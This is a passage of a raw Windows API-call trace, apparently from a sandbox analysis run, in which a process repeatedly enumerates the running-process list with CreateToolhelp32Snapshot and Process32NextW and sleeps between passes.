lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0144.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0144.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.499] CloseHandle (hObject=0xc4) returned 1 [0144.499] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.504] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0144.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0144.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0144.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0144.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0144.590] CloseHandle (hObject=0xbc) returned 1 [0144.590] Sleep (dwMilliseconds=0x12c) [0144.999] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 